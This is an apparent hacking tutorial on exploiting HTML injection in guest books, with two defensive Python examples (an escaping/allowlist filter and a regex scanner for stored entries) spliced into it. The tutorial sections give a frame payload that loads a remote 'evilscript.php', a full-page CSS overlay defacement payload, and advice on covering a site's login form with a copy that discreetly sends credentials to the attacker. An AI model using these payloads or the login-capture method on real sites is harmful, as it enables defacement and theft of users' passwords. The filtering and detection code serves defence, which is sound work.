
So you have found a guest book which allows for HTML injection. So what now, what can you do?


You can do a lot of interesting stuff with HTML injection (which is actually called XSS).
Like what...
So we know that we can enter HTML into the page. Chances are that if the owner hasn't stopped you putting HTML into the page, they won't have stopped you putting PHP into the page either (this will only work if the website is hosted on a host which has PHP installed for its users; most hosts allow PHP pages, I believe).
But what if you can't inject PHP into the guest book?
Ok, so you can't inject PHP directly into the guest book. Unlucky.
But it's not the end of the world. Let's think through HTML and work out what we might be able to use here: what allows us to put things into a webpage without the processing being done on that website?
IFRAME, FRAME, EMBED, APPLET
FRAME, IFRAME
Let's say you want to get a PHP page onto a website which only accepts HTML, so let's give it some HTML.
Code:
<frame src="http://www.yoursite.org/evilscript.php">
Now what does this do?
It creates an area on the page (its size can be set with the height and width parameters) which shows whatever is on the page you have pointed it at (in this case http://www.yoursite.org/evilscript.php).
Please note that all processing of information is done where that page is hosted.
EMBED, APPLET
Now for all you clever clogs who can write things in Java, Flash etc.: you could write something in that language which gets information for you or does some other task (I'm not going to go into a lot of detail, as I don't know Java, Flash or what you are able to do with these).
Please note that all processing of information is done where this is hosted.
Ok, we can put things onto the website, but you can't really do much to the website, can you? You can't deface it or get passwords.
Well we can, but this involves another element of HTML: STYLE.
What this does is define how something appears on a page, so you can write a style to make anything in the bold tags (<b>) use the Arial font with a blue font colour, or something like that.
Wow, we can make the thing look nice, but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There are a couple of things that style can do which are very useful...
Z-INDEX, what this does is define which layer of the page your information is on.
The default level is 0; this is the original webpage.
1 is above 0, therefore if you set something to z-index = 1 it will be above the information on level 0, which is the original webpage.
-1 is below 0, therefore if you set something to z-index = -1 it will be below the information on level 0, which means that what you put in would be hidden behind the original website.
POSITION, what this does is define where on the page the thing you have used position on will be displayed. For this I will only go into absolute position, but there is also relative position.
With this you define exactly where you want something to be placed. There are two parameters to absolute position, top and left. These are how far from the top of the browser area you want something and how far from the left of the browser area you want it.
HEIGHT and WIDTH, what these do is define what size something is.
Now let's combine all those together. What would happen if you set...
z-index to 1
position top = 0
position left = 0
height = 100%
width = 100%
on something?
Well, it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:
<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>
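Seen from the guest book's side, the frame payload and the overlay payload above are both stopped by the same two standard defences: escaping every entry on output (so the browser never sees a tag), or passing entries through an allowlist filter that keeps a few formatting tags and drops everything else, including style blocks and their CSS. The following is an added Python example, not code from this tutorial or from Learn2Hack; it assumes nothing beyond the Python standard library, and the two payloads are the tutorial's own, rebuilt here as constructed test input.

```python
"""Two ways a guest book can render an entry without letting it take over the page.

Added example (not from the tutorial). Standard library only; the payloads
below are the tutorial's, embedded here as constructed test input.
"""
import html
from html.parser import HTMLParser

# The tutorial's two payloads, as constructed input.
FRAME_PAYLOAD = '<frame src="http://www.yoursite.org/evilscript.php">'
OVERLAY_PAYLOAD = """<style>
#elem { z-index: 1; position: absolute; top: 0; left: 0;
        width: 100%; height: 100%; background-color: black; color: red; }
</style>
<div id=elem><p align=center><b>You have been Hacked...<br>By Me<br></b></p></div>"""


def escape_entry(entry: str) -> str:
    """Option 1: never render markup. Every '<' becomes '&lt;', so the browser
    shows the entry as literal text and no element is ever created."""
    return html.escape(entry, quote=True)


# Option 2: an allowlist, for sites that want a little formatting in entries.
ALLOWED_TAGS = {"b", "i", "p", "br"}          # tag names kept; attributes always dropped
VOID_TAGS = {"br"}                            # no closing tag is emitted for these
DROP_WITH_CONTENT = {"style", "script", "applet", "object"}  # element and body removed


class AllowlistFilter(HTMLParser):
    """Rebuilds an entry from parsed tokens, keeping only allowlisted tags.

    Unknown tags (frame, iframe, embed, div, form, ...) are removed but their
    text is kept; style/script blocks are removed together with their content,
    so CSS such as z-index or position never reaches the page. Attributes are
    dropped on every kept tag because id, style and on* handlers are exactly
    what the overlay technique needs."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self._skip_depth = 0  # >0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            if self._skip_depth:
                self._skip_depth -= 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # convert_charrefs decoded entities on the way in; re-escape on the way out.
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))


def filter_entry(entry: str) -> str:
    parser = AllowlistFilter()
    parser.feed(entry)
    parser.close()  # flushes buffered text
    return "".join(parser.out)


if __name__ == "__main__":
    for payload in (FRAME_PAYLOAD, OVERLAY_PAYLOAD):
        print("escaped :", escape_entry(payload))
        print("filtered:", repr(filter_entry(payload)))
```

Escaping is the default to reach for; the allowlist is only worth its extra parsing surface when the site genuinely wants `<b>` and friends in entries. Note that the filtered overlay payload keeps the attacker's text but loses the style block, the div and every attribute, so nothing in it can be positioned or layered over the page.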
But what about getting passwords?
Well, if you can cover their web page with your own, maybe you can take their source code, put that into what has been given above, and change the form which allows them to log in so that it sends you the information instead. Obviously this is very obvious, so you will have to think of ways of changing this method to make sure you don't make it obvious what has just happened.
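For a site owner auditing a guest book that already holds entries, the combination described above (a full-page positioned element plus a form that posts somewhere else) is a pattern a scanner can flag for review, alongside the frame, embed and applet loaders from earlier in the tutorial. The following is an added Python example, not code from the tutorial; the sample entries and the example.invalid host are constructed here, and the scanner is a triage aid over stored entries, not a substitute for escaping on output.

```python
"""Audit stored guest-book entries for overlay, remote-loader and fake-login signals.

Added example (not from the tutorial). Standard library only; the sample
entries below are constructed, with example.invalid as a placeholder host.
"""
import re

# Each pattern is one signal; the combinations are what matter.
REMOTE_LOADER = re.compile(r"<\s*(?:frame|iframe|embed|applet|object|script)\b", re.I)
ABSOLUTE_POSITION = re.compile(r"position\s*:\s*(?:absolute|fixed)", re.I)
FULL_SIZE = re.compile(r"(?:width|height)\s*:\s*100\s*%", re.I)
HIGH_LAYER = re.compile(r"z-index\s*:\s*[1-9]", re.I)
FORM_TAG = re.compile(r"<\s*form\b", re.I)
PASSWORD_INPUT = re.compile(r"<\s*input\b[^>]*type\s*=\s*['\"]?password", re.I)
OFFSITE_ACTION = re.compile(r"<\s*form\b[^>]*action\s*=\s*['\"]?\s*(?:https?:)?//", re.I)


def audit_entry(entry: str) -> list[str]:
    """Return the names of the risky constructs found in one entry, in a fixed order."""
    findings: list[str] = []
    if REMOTE_LOADER.search(entry):
        findings.append("remote_content_loader")
    if ABSOLUTE_POSITION.search(entry) and FULL_SIZE.search(entry):
        findings.append("full_page_overlay")          # the z-index/position/100% trick
    elif ABSOLUTE_POSITION.search(entry) or HIGH_LAYER.search(entry):
        findings.append("positioned_element")         # partial overlay, still suspicious
    if FORM_TAG.search(entry):
        findings.append("form")                       # a guest book has no reason to hold one
        if PASSWORD_INPUT.search(entry):
            findings.append("password_field")
        if OFFSITE_ACTION.search(entry):
            findings.append("form_posts_offsite")
    return findings


def severity(findings: list[str]) -> str:
    """Map findings to a triage level; credential collection outranks defacement."""
    if "password_field" in findings or "form_posts_offsite" in findings:
        return "critical"
    if "full_page_overlay" in findings or "remote_content_loader" in findings:
        return "high"
    if findings:
        return "medium"
    return "none"


def audit_all(entries: dict[str, str]) -> dict[str, tuple[list[str], str]]:
    """Audit a mapping of entry id -> raw stored HTML."""
    report = {}
    for name, body in entries.items():
        found = audit_entry(body)
        report[name] = (found, severity(found))
    return report


# Constructed sample entries (placeholder host example.invalid).
SAMPLE_ENTRIES = {
    "benign": "Great site, <b>thanks</b> for the tips!",
    "overlay": ("<style>#x{z-index:1;position:absolute;top:0;left:0;width:100%;height:100%}"
                "</style><div id=x>defaced</div>"),
    "frame": '<iframe src="http://example.invalid/page.php"></iframe>',
    "fake_login": ('<div style="position:absolute;top:0;left:0;width:100%;height:100%;z-index:1">'
                   '<form action="http://example.invalid/collect" method="post">'
                   'User <input name=u> Pass <input type=password name=p></form></div>'),
}


if __name__ == "__main__":
    for name, (found, level) in audit_all(SAMPLE_ENTRIES).items():
        print(f"{name:11} {level:9} {found}")
```

Because these are plain regexes over stored text, they miss entity-encoded or split-up markup; treat a hit as a reason to look at the entry, and treat the absence of hits as nothing more than that. The control that actually prevents the technique is how the guest book renders entries, not how it scans them afterwards.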
Practicing HTML Injection/XSS
If anyone is interested in practicing what I have been talking about here, on my website I have created an area (completely secure) which will allow you to try this on different levels of filtering.
Each user has their own area (which only that user can access), so there are no worries about using it and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's", then to "XSS", then choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).
